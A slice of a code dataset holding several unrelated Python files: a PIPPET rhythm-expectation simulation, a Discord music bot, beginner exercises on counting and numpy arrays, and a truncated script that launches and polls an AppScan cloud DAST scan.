V\n\n @abstractmethod\n def run(self) -> None:\n ''' Simulation for entire stimulus (i.e. all time steps) '''\n for i in range(1, self.n_ts):\n pass # At least, this should call self.step()\n\n\nclass mPIPPET(PIPPET):\n ''' PIPPET with multiple event streams '''\n\n def step(self, t_i: int, mu_prev: float, V_prev: float) -> tuple[float, float]:\n ''' Posterior update for a time step '''\n\n # Internal phase noise\n noise = np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n\n # Sum dmu across event streams\n dmu_sum = 0\n for s_i in range(self.n_streams):\n dmu = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dmu *= (self.streams[s_i].mu_hat(mu_prev, V_prev) - mu_prev)\n dmu_sum += dmu\n mu = mu_prev + self.params.dt*(1 - dmu_sum) + noise\n\n # Sum dV across event streams\n dV_sum = 0\n for s_i in range(self.n_streams):\n dV = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dV *= (self.streams[s_i].V_hat(mu, mu_prev, V_prev) - V_prev)\n dV_sum += dV\n V = V_prev + self.params.dt*(self.params.sigma_phi**2 - dV_sum)\n\n # Update posterior based on events in any stream\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n for s_i in range(self.n_streams):\n if self.is_onset(t_prev, t, s_i):\n mu_new = self.streams[s_i].mu_hat(mu, V)\n V = self.streams[s_i].V_hat(mu_new, mu, V)\n mu = mu_new\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(self.streams[s_i].lambda_hat(mu_prev+.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] += np.log(self.streams[s_i].lambda_hat(mu_prev-.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(1-self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev+.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] += np.log(1-self.streams[s_i].lambda_hat(mu_prev-.01, V_prev)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n\n self.mu_s[t_i] = mu\n self.V_s[t_i] = V\n \n return mu, V\n\n def run(self) -> None:\n ''' Step through entire stimulus, tracking sufficient statistics '''\n for i in range(1, self.n_ts):\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, mu_prev, V_prev)\n\n\nclass pPIPPET(PIPPET):\n ''' PIPPET with pattern (i.e. template) inference '''\n\n def __init__(self, params: PIPPETParams, prior: np.ndarray):\n super().__init__(params)\n\n # Track likelihoods and big Lambdas per pattern\n self.n_m = self.n_streams\n self.L_s = np.zeros(self.n_ts)\n self.L_ms = np.zeros((self.n_ts, self.n_m))\n self.p_m = np.zeros((self.n_ts, self.n_m))\n self.p_m[0] = prior\n self.p_m[0] = self.p_m[0]/self.p_m[0].sum()\n\n # Initialise big Lambdas using mu_0 and V_0\n for s_i, m in enumerate(self.streams):\n self.L_ms[0, s_i] = m.lambda_hat(self.mu_s[0], self.V_s[0])\n self.L_s[0] = np.sum(self.p_m[0] * self.L_ms[0])\n\n def step_stream(self, s_i: int, mu_prev: float, V_prev: float, is_event: bool=False) -> tuple[float, float]:\n ''' Posterior step for a given pattern '''\n\n noise = np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n\n dmu = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dmu *= (self.streams[s_i].mu_hat(mu_prev, V_prev) - mu_prev)\n mu = mu_prev + self.params.dt*(1 - dmu) + noise\n\n dV = self.streams[s_i].lambda_hat(mu_prev, V_prev)\n dV *= (self.streams[s_i].V_hat(mu, mu_prev, V_prev) - V_prev)\n V = V_prev + self.params.dt*(self.params.sigma_phi**2 - dV)\n\n if is_event:\n mu_new = self.streams[s_i].mu_hat(mu, V)\n V = self.streams[s_i].V_hat(mu_new, mu, V)\n mu = mu_new\n\n return mu, V\n\n def step(self, t_i: int, lambda_prev: float, mu_prev: float, V_prev: float) -> tuple[float, float]:\n mu_ms = np.zeros(self.n_m)\n V_ms = np.zeros(self.n_m)\n\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n\n # For each pattern\n for s_i in range(self.n_m):\n lambda_m_prev = self.L_ms[t_i-1, s_i]\n prev_p_m = self.p_m[t_i-1, s_i]\n\n # Update p_m based on event observations (or absence of them)\n is_event = self.is_onset(t_prev, t, s_i)\n d_p_m = prev_p_m * (lambda_m_prev/lambda_prev - 1)\n if not is_event:\n d_p_m *= -self.params.dt * lambda_prev\n self.p_m[t_i, s_i] = prev_p_m + d_p_m\n\n # Update posterior and lambda_m\n mu_m, V_m = self.step_stream(s_i, mu_prev, V_prev, is_event)\n lambda_m = self.streams[s_i].lambda_hat(mu_m, V_m)\n\n self.L_ms[t_i, s_i] = lambda_m\n mu_ms[s_i] = mu_m\n V_ms[s_i] = V_m\n\n if is_event:\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu_m, V_m)*self.params.dt)\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(1-self.streams[s_i].lambda_hat(mu_m, V_m)*self.params.dt)\n\n # Marginalize across patterns\n self.mu_s[t_i] = np.sum(self.p_m[t_i] * mu_ms)\n self.L_s[t_i] = np.sum(self.p_m[t_i] * self.L_ms[t_i])\n self.V_s[t_i] = np.sum(self.p_m[t_i] * V_ms)\n self.V_s[t_i] += np.sum(self.p_m[t_i]*(1 - self.p_m[t_i])*np.power(mu_ms, 2))\n for m in range(self.n_m):\n for n in range(self.n_m):\n if m != n:\n self.V_s[t_i] -= self.p_m[t_i,m]*self.p_m[t_i,n]*mu_ms[m]*mu_ms[n]\n\n return self.mu_s[t_i], self.V_s[t_i]\n\n def run(self) -> None:\n ''' Step through entire stimulus, for all patterns '''\n\n # For each time step\n for i in range(1, self.n_ts):\n lambda_prev = self.L_s[i-1]\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, lambda_prev, mu_prev, V_prev)\n\n\nclass oscPIPPET(PIPPET):\n ''' Oscillatory PIPPET '''\n\n def __init__(self, params: PIPPETParams):\n super().__init__(params)\n self.z_s = np.ones(self.n_ts, dtype=np.clongdouble)\n self.z_s[0] = np.exp(complex(-self.params.V_0/2, self.params.mu_0))\n\n def step(self, t_i: int, z_prev: complex, mu_prev: float, V_prev: float) -> complex:\n ''' Posterior update for a time step '''\n\n dz_sum = 0\n for s_i in range(self.n_streams):\n blambda = self.streams[s_i].zlambda(mu_prev, V_prev, self.params.tau)\n z_hat = self.streams[s_i].z_hat(mu_prev, V_prev, blambda, self.params.tau)\n dz_sum += blambda*(z_hat-z_prev)*self.params.dt\n\n dz_par = -(self.params.sigma_phi**2)/2 * self.params.dt\n dz_perp = self.params.tau * self.params.dt\n z = z_prev * np.exp(1j*dz_perp + dz_par) - dz_sum\n # Alternatively:\n #z = z_prev + z_prev*complex(-(self.params.sigma_phi**2)/2, self.params.tau)*self.params.dt - dz_sum\n\n mu, V = PIPPETStream.z_mu_V(z)\n\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n for s_i in range(self.n_streams):\n if self.is_onset(t_prev, t, s_i):\n z = self.streams[s_i].z_hat(mu, V, self.streams[s_i].zlambda(mu, V, self.params.tau), self.params.tau)\n mu, V = PIPPETStream.z_mu_V(z)\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(self.streams[s_i].zlambda(mu_prev+.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] += np.log(self.streams[s_i].zlambda(mu_prev-.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(1-self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(1-self.streams[s_i].zlambda(mu_prev+.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] += np.log(1-self.streams[s_i].zlambda(mu_prev-.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n\n # Noise\n mu += np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n V *= np.exp(np.sqrt(self.params.dt) * self.params.eta_V * np.random.randn())\n\n # Update\n self.mu_s[t_i], self.V_s[t_i] = mu, V\n self.z_s[t_i] = np.exp(complex(-V/2, mu))\n\n return self.z_s[t_i]\n\n def run(self) -> None:\n ''' Step through entire stimulus, tracking sufficient statistics '''\n for i in range(1, self.n_ts):\n z_prev = self.z_s[i-1]\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, z_prev, mu_prev, V_prev)\n\n\nif __name__ == \"__main__\":\n import pdb\n print('Debugger on - press \\'c\\' to continue examples, \\'q\\' to quit')\n\n # PIPPET parameters, including event times and expectations\n p = PIPPETParams()\n p.overtime = 0.2\n e_times = np.array([0.5, 1.0])\n e_means = np.array([0.25, 0.5, 0.75, 1.0])\n e_vars = np.array([0.0001]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n p.add(e_times, e_means, e_vars, e_lambdas, 'Duple')\n\n # Run PIPPET (mPIPPET but with one expected event stream)\n m = mPIPPET(p)\n print('Running (m)PIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run mPIPPET - two expected event streams, Duple/Triple\n e_means = np.array([0.33, 0.66, 1.0])\n e_vars = np.array([0.0001]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n p.add(e_times, e_means, e_vars, e_lambdas, 'Triple')\n m = mPIPPET(p)\n print('Running mPIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run pPIPPET - now have competing event streams, equal prior\n prior = np.array([0.5, 0.5])\n m = pPIPPET(p, prior)\n print('Running pPIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run oscPIPPET - redefine parameter set of wrapped stream\n p = PIPPETParams()\n p.dt = 0.002\n p.overtime = np.pi/10.\n p.sigma_phi = 0.2\n p.mu_0 = 1\n p.V_0 = 10.0\n p.lambda_0 = 0.001\n e_means = np.array([0])\n e_times = np.array([np.pi, 3*np.pi -.3, 5*np.pi])\n e_vars = np.array([0.005]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n p.add(e_times, e_means, e_vars, e_lambdas, '')\n print('Running oscPIPPET...')\n m = oscPIPPET(p)\n m.run()\n pdb.set_trace()\n\n","repo_name":"Kappers/pyPIPPET","sub_path":"PIPPET.py","file_name":"PIPPET.py","file_ext":"py","file_size_in_byte":20340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36607644460","text":"import discord\nimport os\nfrom discord.ext import commands\nfrom youtube_dl import YoutubeDL\nimport asyncio\nfrom discord.utils import get\nfrom discord.ext.commands.bot import Bot\nfrom discord.member import VoiceState\nfrom discord.ext.commands.context import Context\nfrom src.CurrentSong import CurrentSong\nfrom src.constants import HELP_MESSAGE\n\n\nclass EmptyPlaylistException(Exception):\n pass\n\n\nclass PlaylistBoundsException(Exception):\n pass\n\n\nclass MusicCog(commands.Cog):\n def __init__(self, bot: Bot):\n \"\"\"Cog constructor.\n\n Args:\n bot (Bot): Discord bot refference.\n \"\"\"\n self.YTDL_OPTIONS = {\n \"format\": \"bestaudio\",\n \"noplaylist\": True,\n }\n self.FFMPEG_OPTIONS = {\n \"before_options\": \"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\",\n \"options\": \"-vn\",\n }\n self.bot = bot\n self.help_message = HELP_MESSAGE\n self.is_playing_on_server = {}\n self.server_playlist = {}\n self.server_mutex_playlist = {}\n self.server_voice_channel = {}\n self.server_current_song = {}\n\n def init_channel(self, ctx: Context):\n \"\"\"Initializing voice channel for bot.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_playlist[ctx.guild.id] = []\n self.server_mutex_playlist[ctx.guild.id] = asyncio.Lock()\n self.server_voice_channel[ctx.guild.id] = ctx.author.voice.channel\n self.server_current_song[ctx.guild.id] = CurrentSong(\"\", \"\")\n\n def search_youtube(self, item: str) -> any:\n \"\"\"Function search for given song in YouTube.\n\n Args:\n item (str): Specified song to search.\n\n Returns:\n any: Returns dict of song info if everything ok, else False.\n \"\"\"\n with YoutubeDL(self.YTDL_OPTIONS) as ydl:\n try:\n info = ydl.extract_info(\"ytsearch:%s\" % item, download=False)[\n \"entries\"\n ][0]\n except Exception:\n return False\n\n return {\n \"source\": info[\"formats\"][0][\"url\"],\n \"title\": info[\"title\"],\n \"duration\": info[\"duration\"],\n \"yt_url\": info[\"webpage_url\"],\n }\n\n async def send_message(self, message_str: str, ctx: Context):\n \"\"\"Sends message in correct template.\n\n Args:\n message_str (str): Specified message to send.\n ctx (Context): Context of executed discord command.\n \"\"\"\n await ctx.send(f\"```\\n{message_str}\\n```\")\n\n def is_channel_specified(self, ctx: Context) -> bool:\n \"\"\"Checks if sender of message is on any voice channel.\n\n Args:\n ctx (Context: Context of executed discord command.\n\n Returns:\n bool: True if voice channel on contextial server is specified.\n \"\"\"\n if (\n ctx.guild.id in self.server_voice_channel.keys()\n and self.server_voice_channel[ctx.guild.id] != \"\"\n ):\n return True\n else:\n return False\n\n async def send_funny_gifs(self, query: str, song: dict, ctx):\n \"\"\"Checks if song has key-words and sends funny gifs if True.\n\n Args:\n query (str): Searching quote.\n song (dict): Song info.\n ctx (Context): Context of executed discord command.\n \"\"\"\n concat_str = query.upper() + song[\"title\"].upper()\n gifx = False\n if concat_str.find(\"XAYOO\") != -1:\n gifx = True\n gifb = False\n if (\n concat_str.find(\"BOXDEL\") != -1\n or concat_str.find(\"MASN\") != -1\n or concat_str.find(\"AFERKI\") != -1\n or concat_str.find(\"MGNG\") != -1\n ):\n gifb = True\n if gifx:\n await ctx.send(\"https://tenor.com/view/xayoo-twitch-idol-gif-22718834\")\n if gifb:\n await ctx.send(\n \"https://tenor.com/view/boxdel-kwatera-pszczulka-kofelina-jasper-gif-22735704\"\n )\n\n def play_next(self, ctx: Context):\n \"\"\"Plays next song on playlist.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n if len(self.server_playlist[ctx.guild.id]) > 0:\n self.is_playing_on_server[ctx.guild.id] = True\n song_url = self.server_playlist[ctx.guild.id][0][0][\"source\"]\n popped_song = self.server_playlist[ctx.guild.id].pop(0)\n self.server_current_song[ctx.guild.id].song_url = popped_song[0][\"yt_url\"]\n self.server_current_song[ctx.guild.id].song_name = popped_song[0][\"title\"]\n\n try:\n self.server_voice_channel[ctx.guild.id].play(\n discord.FFmpegPCMAudio(song_url, **self.FFMPEG_OPTIONS),\n after=lambda f: self.play_next(ctx),\n )\n except discord.errors.ClientException as e:\n if str(e) == \"Already playing audio.\":\n print(\"~BOT ERROR~ | ~Already playing audio exception!~\")\n else:\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_current_song[ctx.guild.id].clear_info()\n\n async def reconnect(self, ctx: Context):\n \"\"\"Provides reconnecting to channel after network error.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n print(\"~BOT STATE INFO~ | ~Bot is reconnecting~\")\n self.server_voice_channel[ctx.guild.id] = await self.server_playlist[\n ctx.guild.id\n ][0][1].connect()\n\n self.server_voice_channel[ctx.guild.id].play(\n discord.FFmpegPCMAudio(m_url, **self.FFMPEG_OPTIONS),\n after=lambda f: self.play_next(ctx),\n )\n\n async def play_music(self, ctx: Context):\n \"\"\"Function starts playing music on server.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n if len(self.server_playlist[ctx.guild.id]) > 0:\n self.is_playing_on_server[ctx.guild.id] = True\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n song_url = self.server_playlist[ctx.guild.id][0][0][\"source\"]\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n try:\n self.server_voice_channel[ctx.guild.id] = await self.server_playlist[\n ctx.guild.id\n ][0][1].connect()\n except discord.errors.ClientException:\n await self.server_voice_channel[ctx.guild.id].move_to(\n self.server_playlist[ctx.guild.id][0][1]\n )\n\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n popped_song = self.server_playlist[ctx.guild.id].pop(0)\n self.server_current_song[ctx.guild.id].song_url = popped_song[0][\n \"yt_url\"\n ]\n self.server_current_song[ctx.guild.id].song_name = popped_song[0][\n \"title\"\n ]\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n try:\n self.server_voice_channel[ctx.guild.id].play(\n discord.FFmpegPCMAudio(song_url, **self.FFMPEG_OPTIONS),\n after=lambda f: self.play_next(ctx),\n )\n except discord.errors.ClientException:\n self.reconnect(ctx)\n else:\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_current_song[ctx.guild.id].clear_info()\n\n @commands.command(aliases=[\"p\", \"play\", \"P\"])\n async def _play(self, ctx: Context, *args):\n \"\"\"Reacts on '!play' command.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n query = \" \".join(args)\n if ctx.author.voice is None or ctx.author.voice.channel is None:\n await self.send_message(\n \"You need to be in any voice channel to invite me! 🤬\", ctx\n )\n await ctx.send(\"https://j.gifs.com/qxjV50.gif\")\n else:\n if ctx.guild.id not in self.is_playing_on_server.keys():\n self.init_channel(ctx)\n voice_channel = ctx.author.voice.channel\n song = self.search_youtube(query)\n if type(song) == bool:\n await self.send_message(\n \"Try other video, this one cant be played! 🤐\", ctx\n )\n await ctx.send(\"https://c.tenor.com/ACD_2wFkA4QAAAAC/tssk-no.gif\")\n else:\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n await self.send_funny_gifs(query, song, ctx)\n await self.send_message(\n \"Song {} added to the queue, its current position: {}\".format(\n song[\"title\"],\n str(len(self.server_playlist[ctx.guild.id]) + 1),\n ),\n ctx,\n )\n self.server_playlist[ctx.guild.id].append([song, voice_channel])\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n if self.is_playing_on_server[ctx.guild.id] is False:\n await self.play_music(ctx)\n\n @commands.command(aliases=[\"queue\", \"q\", \"playlist\"])\n async def _queue(self, ctx: Context):\n \"\"\"Shows queue/playlist.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n retval = \"\"\n for i in range(0, len(self.server_playlist[ctx.guild.id])):\n retval += (\n str(i + 1)\n + \"-> \"\n + self.server_playlist[ctx.guild.id][i][0][\"title\"]\n + \" | \"\n + f\"{(self.server_playlist[ctx.guild.id][i][0]['duration'] // 60)}\"\n + \":\"\n + f\"{(self.server_playlist[ctx.guild.id][i][0]['duration'] % 60):02}\"\n + \"\\n\"\n )\n\n if retval != \"\":\n await self.send_message(retval, ctx)\n else:\n await self.send_message(\"No music in queue! 🛑\", ctx)\n\n @commands.command(aliases=[\"current\", \"current_song\"])\n async def _current(self, ctx: Context):\n \"\"\"Shows currently played song.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n if not self.server_current_song[ctx.guild.id].is_empty():\n await self.send_message(\n \"Current song's name is: {} | [{}]\".format(\n self.server_current_song[ctx.guild.id].song_name,\n self.server_current_song[ctx.guild.id].song_url,\n ),\n ctx,\n )\n else:\n await self.send_message(\"There is no current song! 🛑\", ctx)\n\n @commands.command(aliases=[\"skip\", \"s\"])\n async def _skip(self, ctx: Context):\n \"\"\"Skips currently played song.\n\n Args:\n ctx (Context, optional): Context of executed discord command. Defaults to None.\n \"\"\"\n if self.is_channel_specified(ctx):\n self.server_voice_channel[ctx.guild.id].pause()\n await self.play_music(ctx)\n\n @commands.command(aliases=[\"clear\", \"c\"])\n async def _clear(self, ctx: Context):\n \"\"\"Clears whole playlist and stop playing bot.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n if self.is_channel_specified(ctx):\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n self.server_voice_channel[ctx.guild.id].stop()\n self.server_playlist[ctx.guild.id] = []\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_current_song[ctx.guild.id].clear_info()\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n\n @commands.command(aliases=[\"remove\", \"r\"])\n async def _remove(self, ctx: Context, *args):\n \"\"\"Removes song with given index from playlist.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n query = \" \".join(args)\n try:\n if len(self.server_playlist[ctx.guild.id]) == 0:\n raise EmptyPlaylistException\n int_arg = int(query)\n if int_arg < 1 or int_arg > len(self.server_playlist[ctx.guild.id]):\n raise PlaylistBoundsException(f\"{int_arg}\")\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n self.server_playlist[ctx.guild.id].pop(int_arg - 1)\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n\n except (EmptyPlaylistException):\n await self.send_message(\"🛑 You can't remove from empty playlist! 🛑\", ctx)\n except (ValueError):\n await self.send_message(\n \"🛑 Hold on! You passed incorrect argument! 🛑\\nExample use:\\n\\n====================\\n!remove 2\\n====================\",\n ctx,\n )\n except (PlaylistBoundsException) as e:\n await self.send_message(\n f\"🛑 There is no {e}. place on the playlist! Try numbers from 1 to {len(self.server_playlist[ctx.guild.id])} 🛑\",\n ctx,\n )\n\n @commands.command(aliases=[\"help\", \"h\"])\n async def _help(self, ctx: Context):\n \"\"\"Shows help message.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n await self.send_message(self.help_message, ctx)\n\n @commands.Cog.listener()\n async def on_voice_state_update(\n self, ctx: Context, before: VoiceState, after: VoiceState\n ):\n \"\"\"Function reacts on disconnection of bot from voice channel. It executes _clear method.\n\n Args:\n ctx (Context): Context of executed discord command.\n before (VoiceState): State of channel before disconnection.\n after (VoiceState): State of channel after disconnection.\n \"\"\"\n if (\n before.channel is not None\n and after.channel is None\n and str(ctx) == \"DJ WidziszMnie#0843\"\n ):\n print(\"~BOT_INFO~ | Bot disconnected!\")\n await self._clear(ctx)\n","repo_name":"lukasz-staniszewski/discord-music-bot","sub_path":"src/musicBot.py","file_name":"musicBot.py","file_ext":"py","file_size_in_byte":14614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"69844429373","text":"# Write a Python program to count the number of even and odd numbers from a series of numbers.\r\n\r\nlist = [1,2,3,4,5,6,7,8,9]\r\n\r\neven_count = 0\r\nodd_count = 0\r\n\r\nfor i in list:\r\n if i % 2==0:\r\n even_count += 1\r\n else:\r\n odd_count += 1 \r\n\r\nprint(\"No of even numbers:\",even_count)\r\nprint(\"No of odd numbers:\",odd_count)","repo_name":"SrikanthMaku/PyAss103","sub_path":"Assignment103.py","file_name":"Assignment103.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27466077508","text":"from numpy import *\r\n\r\n\"\"\"\r\n## Creating Arrays ##\r\n\r\n# array()\r\narr1 = array([5, 7, 6, 3], float)\r\nprint(arr1)\r\n\r\n# linspace()\r\narr2 = linspace(0, 15, 16) # starting(included), ending(included), number of ways it can be divided\r\nprint(arr2)\r\n\r\n# arange()\r\narr3 = arange(1, 15, 2) # starting(included), ending(included), spacing between two numbers\r\nprint(arr3)\r\n\r\n# logspace()\r\narr4 = logspace(1, 40, 5) # 10^starting(included), 10^ending(included), divided into parts\r\nprint(arr4)\r\nprint('%.2f' % arr4[0])\r\nprint('%.2f' % arr4[4])\r\n\r\n# zeros() and ones()\r\narr5 = zeros(5)\r\narr6 = ones(5, int) # implicitly float, explicitly any data type\r\nprint(arr5, arr6)\r\n\"\"\"\r\n\r\n\"\"\"\r\n## Operations on array ##\r\n\r\n# Addition & Subtraction\r\narr = array([1, 2, 3, 4, 5])\r\narr = arr + 5\r\nprint(arr)\r\n\r\narr1 = array([1, 2, 3, 4, 5])\r\narr2 = array([1, 2, 3, 4, 5])\r\narr3 = arr1 + arr2\r\nprint(arr3)\r\n\r\n# inbuilt functions\r\nprint(sum(arr1)) # min, max, avg, etc\r\nprint(sin(arr1)) # cos, tan, sinh, cosh, etc\r\nprint(log(arr1)) # e, pi, etc\r\nprint(sqrt(arr1)) # ceil, floor, pow, etc\r\nprint(sort(arr1)) # reverse, etc\r\nprint(concatenate([arr1, arr2])) # compare, etc\r\n\"\"\"\r\n\r\n## Copying an Array ##\r\nar1 = array([1, 2, 9, 8, 5])\r\nar2 = ar1\r\nprint(ar1, id(ar1))\r\nprint(ar2, id(ar2))\r\n\r\n# view - shallow copy\r\na1 = array([1, 2, 9, 8, 5])\r\na2 = a1.view()\r\na1[1] = 7\r\na2[2] = 67\r\nprint(a1, id(a1)) # different address's, but when one array value is mutated the other array got mutated too\r\nprint(a2, id(a2))\r\n\r\n# copy - deep copy\r\nb1 = array([1, 2, 9, 8, 5])\r\nb2 = b1.copy()\r\nb1[1] = 7\r\nb2[2] = 67\r\nprint(b1, id(b1)) # different address's, and when one array value is mutated it does not affect the other arrays\r\nprint(b2, id(b2))\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Numpy Operations.py","file_name":"Numpy Operations.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"31255580110","text":"#!/usr/bin/env python3\r\nimport requests\r\nimport json\r\nimport sys\r\nimport time\r\n\r\n# The ASoC REST APIs used in this script:\r\nREST_APIKEYLOGIN = \"https://cloud.appscan.com/api/v2/Account/ApiKeyLogin\"\r\nREST_SCANS = \"https://cloud.appscan.com/api/v2/Scans/DynamicAnalyzer\"\r\nbase_api_url = \"https://cloud.appscan.com/api/v2\"\r\n\r\n\r\ndef generate_engagement_id():\r\n return str(int(time.time())) # Use timestamp as engagement ID\r\n\r\n\r\ndef main():\r\n if len(sys.argv) != 6:\r\n print(\"\\nUsage: python appscan_dast.py \\n\")\r\n sys.exit(1)\r\n\r\n API_KEY = sys.argv[1]\r\n API_SECRET = sys.argv[2]\r\n APP_ID = sys.argv[3]\r\n TARGET_URL = sys.argv[4]\r\n SCAN_NAME = sys.argv[5]\r\n\r\n token = get_token(API_KEY, API_SECRET)\r\n\r\n scan_id = start_dast_scan(token, APP_ID, TARGET_URL, SCAN_NAME)\r\n print(f\"DAST scan started successfully. Scan ID: {scan_id}\")\r\n\r\n # Generate engagement ID\r\n engagement_id = generate_engagement_id()\r\n\r\n print(f\"Waiting for scan to finish\")\r\n start = time.time()\r\n elapsed = 0\r\n max_time = 60 * 30\r\n\r\n while elapsed < max_time:\r\n prev_status = \"\"\r\n status_obj = get_scan_status(token, scan_id)\r\n if status_obj is None:\r\n print(\"Error getting status\")\r\n break\r\n\r\n status = status_obj[\"Status\"]\r\n\r\n if status != prev_status:\r\n prev_status = status\r\n print(f\"Scan Status: {prev_status}\")\r\n\r\n if status == \"Completed\":\r\n print(f\"Scan completed with status: {status}\")\r\n print(\"Scan Summary:\")\r\n print(f\"\\t High Issues: {status_obj['HighVulnerabilities']}\")\r\n print(f\"\\t Med Issues: {status_obj['MediumVulnerabilities']}\")\r\n print(f\"\\t Low Issues: {status_obj['LowVulnerabilities']}\")\r\n print()\r\n print(f\"For full details visit: https://cloud.appscan.com/main/myapps/{APP_ID}/scans/{scan_id}/scanOverview\")\r\n report_id = generate_report(token, scan_id, SCAN_NAME)\r\n if report_id is not None:\r\n break\r\n elif status == \"Error\":\r\n print(f\"Scan completed with status: {status}\")\r\n print(f\"Error message: {status_obj['ErrorMessage']}\")\r\n break\r\n\r\n time.sleep(30)\r\n elapsed = time.time() - start\r\n\r\n if elapsed >= max_time:\r\n print(\"Scan timed out after 30 minutes.\")\r\n\r\n\r\ndef get_token(api_key, api_secret):\r\n try:\r\n json_data = {\"KeyId\": api_key, \"KeySecret\": api_secret}\r\n response = requests.post(REST_APIKEYLOGIN, json=json_data)\r\n response.raise_for_status()\r\n json_data = json.loads(response.text)\r\n return json_data['Token']\r\n except requests.exceptions.RequestException as e:\r\n print(\"Error in get_token():\\n\" + str(e))\r\n sys.exit(1)\r\n\r\n\r\ndef start_dast_scan(token, app_id, target_url, scan_name):\r\n try:\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/json\"\r\n }\r\n json_data = {\r\n \"AppId\": app_id,\r\n \"StartingUrl\": target_url,\r\n \"Profile\": \"Default\",\r\n \"PresenceId\" : \"1791027c-d05e-ee11-8457-14cb65725114\",\r\n \"ScanName\": scan_name,\r\n \"Incremental\": False,\r\n \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; 